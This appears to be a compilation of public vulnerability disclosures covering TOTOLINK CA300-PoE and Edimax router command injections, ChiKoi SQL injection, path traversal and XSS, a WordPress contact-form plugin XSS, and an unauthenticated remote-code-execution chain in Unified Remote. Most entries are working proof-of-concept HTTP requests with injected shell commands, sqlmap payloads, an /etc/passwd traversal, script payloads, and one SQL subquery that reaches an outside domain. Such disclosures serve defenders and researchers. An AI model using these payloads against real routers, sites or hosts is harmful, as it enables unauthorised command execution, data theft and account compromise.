TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the admuser parameter in the setPasswordCfg function.

Permalink

Cannot retrieve contributors at this time

**TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the admuser parameter in the function setPasswordCfg****Description**

TOTOLINK Router **CA300-PoE V6.2c.884** was found to contain a command injection vulnerability in setPasswordCfg.

******Firmware information**

*   Manufacturer's address:https://www.totolink.net/
*   Firmware download address : https://www.totolink.net/home/menu/detail/menu\_listtpl/download/id/139/ids/36.html

**Affected version**

**Version: V6.2c.884**

**Vulnerability details**

POC:

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.254
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 100
    Origin: http://192.168.0.254
    Connection: keep-alive
    Referer: http://192.168.0.254/adm/network_daig.asp?timestamp=1673492576260
    Cookie: SESSION_ID=2:1673492439:2
    
    {'topicurl' : "setting/setPasswordCfg", "admuser":";mkdir /test7777;", "admpass":"11"}
    

Folder created successfully

CVE-2023-24160: VulnerabilityProjectRecords/setPasswordCfg_admuser.md at main · iceyjchen/VulnerabilityProjectRecords

TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the admpass parameter in the setPasswordCfg function.

TOTOLINK Router **CA300-PoE V6.2c.884** was found to contain a command injection vulnerability in setPasswordCfg.

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.254
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 100
    Origin: http://192.168.0.254
    Connection: keep-alive
    Referer: http://192.168.0.254/adm/network_daig.asp?timestamp=1673492576260
    Cookie: SESSION_ID=2:1673492439:2
    
    {'topicurl' : "setting/setPasswordCfg", "admuser":"testuser", "admpass":"11>/tmp/text.txt&mkdir /test2222&echo test:test"}

CVE-2023-24159: VulnerabilityProjectRecords/setPasswordCfg_admpass.md at main · iceyjchen/VulnerabilityProjectRecords

TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the webWlanIdx parameter in the setWebWlanIdx function.

TOTOLINK Router **CA300-PoE V6.2c.884** was found to contain a command injection vulnerability in setWebWlanIdx.

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.254
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 100
    Origin: http://192.168.0.254
    Connection: keep-alive
    Referer: http://192.168.0.254/adm/network_daig.asp?timestamp=1673492576260
    Cookie: SESSION_ID=2:1673492439:2
    
    {"topicurl" :"setting/setWebWlanIdx", "webWlanIdx": "1>/tmp/test.txt|mkdir /webWlanIdx_1111;"}

CVE-2023-24161: VulnerabilityProjectRecords/setWebWlanIdx.md at main · iceyjchen/VulnerabilityProjectRecords

ChiKoi v1.0 was discovered to contain a SQL injection vulnerability via the load_file function.

**ChiKoi-1.0-SQLi****Vendor**

**Description:**

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payload '+(select load\_file('\\\\v3z9cjkbngnzrm7piruwhl6olfr8fzknbqzlmba0.glumar.com\\quv'))+' was submitted in the User-Agent HTTP header. This payload injects a SQL sub-query that calls MySQL's load\_file function with a UNC file path that references a URL on an external domain. The attacker can steal all information from this system and can seriously harm the users of this system, such as extracting bank accounts through which they pay each other, etc.

**STATUS: HIGH Vulnerability - CRITICAL**

\[+\] Payload:

\--\-
Parameter: User\-Agent (User\-Agent)
    Type: boolean\-based blind
    Title: AND boolean\-based blind \- WHERE or HAVING clause (subquery \- comment)
    Payload: Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)' WHERE 2474=2474 AND 9291=(SELECT (CASE WHEN (9291=9291) THEN 9291 ELSE (SELECT 4553 UNION SELECT 6994) END))-- -
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)' WHERE 4578\=4578 AND (SELECT 8224 FROM(SELECT COUNT(\*),CONCAT(0x71706b7171,(SELECT (ELT(8224\=8224,1))),0x716a6a6271,FLOOR(RAND(0)\*2))x FROM INFORMATION\_SCHEMA.PLUGINS GROUP BY x)a)\-- VCWR
\--\-

**Reproduce:**

href

**Proof and Exploit:**

href

**Time spent**

01:30:00

**Writing an exploit**

00:05:00

**In real time:**

\[+\] Online:

\--\-
Parameter: User\-Agent (User\-Agent)
    Type: boolean\-based blind
    Title: AND boolean\-based blind \- WHERE or HAVING clause (subquery \- comment)
    Payload: Mozilla/5.0 (X11; U; Linux x86\_64; en\-US; rv:1.8.1) Gecko/20060601 Firefox/2.0 (Ubuntu\-edgy)' WHERE 8386=8386 AND 8264=(SELECT (CASE WHEN (8264=8264) THEN 8264 ELSE (SELECT 2322 UNION SELECT 6426) END))-- -
\---

CVE-2023-24084: CVE-nu11secur1ty/vendors/tanhongit/2023/ChiKoi at main · nu11secur1ty/CVE-nu11secur1ty

Vsourz Digital Advanced Contact form 7 DB Versions 1.7.2 and 1.9.1 is vulnerable to Cross Site Scripting (XSS).

Permalink

Cannot retrieve contributors at this time

Reflected XSS (Cross-Site Scripting) attack - CVE-2022-45285

\------------------------------------------------------------

Vendor: Vsourz Digital

Wordpress Plugin Versions: Advanced Contact form 7 DB - 1.7.2, 1.9.1

Type: Remote attack

We have identified that the “Advanced Contact form 7 DB - 1.7.2, 1.9.1” Wordpress Plugin Versions are vulnerable to Reflective Cross-site scripting (XSS). This is due to that the Web App fails to sanitize HTML/JavaScript code on the server-side. By leveraging this issue, an attacker is able to cause arbitrary HTML and JavaScript code to be executed in a user's browser (e.g. admin) within the security context of the affected site. This attack can be used in conjunction with a social engineering techniques.

We have managed to bypass the client-side protection (URL Encoding) by intercepting the GET HTTP request using an HTTP proxy tool, and then inserting the XSS payload. Also, we have bypassed the server-side protection (Backslash Escaping) using backticks instead of single or double quotes.

Below, evidence is provided.

Request:

GET /formsurvey/index.php/user/admin/?'><script>alert(\`XSS\`)</script><' HTTP/1.1

Host: 1.1.1.1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

DNT: 1

Connection: close

Upgrade-Insecure-Requests: 1

Response:

HTTP/1.1 200 OK

Date: Fri, 04 Nov 2022 12:56:09 GMT

Server: Apache

Expires: Wed, 11 Jan 1984 05:00:00 GMT

Cache-Control: no-cache, must-revalidate, max-age=0

Pragma: no-cache

Link: <http://1.1.1.1/formsurvey/index.php/wp-json/>; rel="https://api.w.org/"

Link: <http://1.1.1.1/formsurvey/?p=33>; rel=shortlink

Vary: Accept-Encoding

Content-Length: 31433

Connection: close

Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>

....

....

<link rel='canonical' href='http://1.1.1.1/formsurvey/index.php/user/admin/?\\'><script>alert(\`XSS\`)</script><\\'' />

....

....

</html>

CVE-2022-45285: Vsourz-Digital/AdvancedContactForm_CF7_DB_XSS.txt at main · IthacaLabs/Vsourz-Digital

ChiKoi version 1.0 suffers from a directory traversal vulnerability.

====================================================================================================================================| # Title     : ChiKoi version 1.0 Directory Traversal Vulnerability Vulnerability                                                 || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)                                               | | # Vendor    : https://codeload.github.com/tanhongit/new-mvc-shop/zip/refs/tags/v1.0                                              || # Dork      :                                                                                                                    |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  infested file : index.php & admin.php<?phpsession_start();require_once('lib/model.php');require_once('lib/functions.php');require_once('content/models/cart.php');require "lib/statistics.php";require "lib/counter.php";// $count_file = 'logs/counter.txt';// $ip_file = 'logs/ip.txt';// function counting_ip()// {//     $ip = $_SERVER['REMOTE_ADDR'];//     global $count_file, $ip_file;//     if (!in_array($ip, file($ip_file, FILE_IGNORE_NEW_LINES))) {//         $current_val = (file_exists($count_file)) ? file_get_contents($count_file) : 0;//         file_put_contents($ip_file, $ip . "\n", FILE_APPEND);//         file_put_contents($count_file, ++$current_val);//     }// }// counting_ip();if (isset($_GET['controller'])) $controller = $_GET['controller'];else $controller = 'home';if (isset($_GET['action'])) $action = $_GET['action'];else $action = 'index';$file = 'content/controllers/' . $controller . '/' . $action . '.php';if (file_exists($file)) {    require($file);} else {    show_404();}[+]  use payload : ../../../../../../../../../etc/passwd[+]  https://127.0.0.1/chikoiquan.tanhongitcom/index.php?action=../../../../../../../../../etc/passwd[+]  https://127.0.0.1/https://chikoiquan.tanhongitcom/admin.php?file=../../../../../../../../../etc/passwd== Greetings to :===========================================================================jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* |        ============================================================================================

ChiKoi 1.0 Directory Traversal

ChiKoi version 1.0 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : ChiKoi version 1.0 XSS Vulnerability                                                                               || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)                                               | | # Vendor    : https://codeload.github.com/tanhongit/new-mvc-shop/zip/refs/tags/v1.0                                              || # Dork      :                                                                                                                    |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  Register a new membership and enter the membership control panel and choose to modify the member's profile and in the name field put any payload that suits you and then save the changes[+]  Use Payload : <script>alert(/indoushka/);</script>[+]  http://127.0.0.1/chikoiquan.tanhongitcom/        == Greetings to :===========================================================================jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* |        ============================================================================================

ChiKoi 1.0 Cross Site Scripting

An XSS vulnerability was discovered in the Mayan EDMS DMS. Successful XSS exploitation was observed in the in-product tagging system.

CVE-2022-47419: Multiple DMS XSS (CVE-2022-47412 through CVE-20222-47419)

Command Injection vulnerability in Edimax Technology Co., Ltd. Wireless Router N300 Firmware BR428nS v3 allows attacker to execute arbitrary code via the formWlanMP function.

Firmware Version: BR6428NSv3\_1.20 You can download Firmware at this website and use FirmAE to simulate the router environment. 

There is a command injection in formWlanMP Function of binary file webs.   After obtaining the POST parameter, it is directly incorporated into the system function for execution without checking and filtering 

PS You must pass basic verification before you can exploit this vulnerability can find the user/passwd in website  

    POST /goform/formWlanMP HTTP/1.1
    Host: 192.168.2.1
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 53
    Origin: http://192.168.2.1
    Authorization: Basic YWRtaW46MTIzNA==
    Connection: close
    Referer: http://192.168.2.1/status.asp
    Cookie: language=14
    Upgrade-Insecure-Requests: 1
    
    ateFunc=1;touch%20/tmp/Swe3ty&submit-url=%2Findex.asp

CVE-2022-45768: CVE/Edimax.md at main · Erebua/CVE

Because the web management interface for Unified Intents' Unified Remote solution does not itself require authentication, a remote, unauthenticated attacker can change or disable authentication requirements for the Unified Remote protocol, and leverage this now-unauthenticated access to run code of the attacker's choosing.

Small albeit possibly unnecessary update following some additional research into the functionality and modules in UnifiedRemote. I identified a different and possibly more convenient means of achieving Remote Code Execution and a potential avenue for making exploitation Web Triggerable through XHR (though I am yet to get it working).

Another avenue for RCE against the Unified Remote Web Server itself is simply to send three HTTP requests. The first initiates a connection attempt which returns a UR-Connection-ID value.

    GET /client/connect HTTP/1.1
    Host: localhost:9510
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
    Accept: */*
    Accept-Language: en-GB,en;q=0.5
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    Connection: close
    Referer: http://localhost:9510/client/
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    -----
    HTTP/1.1 200 OK
    Date: Mon, 06 Feb 2023 21:14:29 GMT
    Connection: Close
    Content-Type: application/json
    
    {
       "id" : "3e709400-a663-11ed-ae76-000c296b19a8"
    }
    

This is then used to 'authenticate' though any values and the previously provided ID can be used.

    POST /client/request HTTP/1.1
    Host: localhost:9510
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
    Accept: */*
    Accept-Language: en-GB,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    UR-Connection-ID: 3e709400-a663-11ed-ae76-000c296b19a8
    X-Requested-With: XMLHttpRequest
    Content-Length: 132
    Origin: http://localhost:9510
    Connection: close
    Referer: http://localhost:9510/client/
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    
    {"Action":0,"Request":0,"Version":10,"Password":"a95db90f-8f22-49cc-a49b-4ecc1cd40d13","Platform":"android","Source":"android-test"}
    

Finally the same UR-Connection-ID can be used to call the Core.Script module and pass it the necessary Command layout values.

    POST /client/request HTTP/1.1
    Host: localhost:9510
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
    Accept: */*
    Accept-Language: en-GB,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    UR-Connection-ID: 3e709400-a663-11ed-ae76-000c296b19a8
    X-Requested-With: XMLHttpRequest
    Content-Length: 314
    Origin: http://localhost:9510
    Connection: close
    Referer: http://localhost:9510/client/
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    
    {"ID":"Core.Script","Action":7,"Request":7,"Run":{"Name":"default","Extras" : {"Values" : [{"Key" : "cmd","Value" : "calc.exe"}]}},"Source":"android-test"}
    

As for the potential for Web Triggerable abuse, the server utilizes Access-Control-Allow-Origin: * on numerous /web  
and /system endpoints. One in particular that stood out was the /system/remote/add endpoint. This allows for uploading a new 'remote' package as a Zip file which includes a remote.lua script. (I simply used an existing sample remote from the remotes folder in programdata). This file can be changed to the following:

    io.popen("<system-command-here>")
    

It is theoretically possible that one may be able to submit the zip file as base64 through use of base64 in atob() and use of ajax/xhr requests in javascript. Though CORS forbids the content-type header which has made inferring the body data as an octet stream quite challenging. The server accepts both this and the follow up /system/reload request through xhr requests however fails to find the Zip file stream start point when attempting to process it.

Anyway, cheers.

Tag

#firefox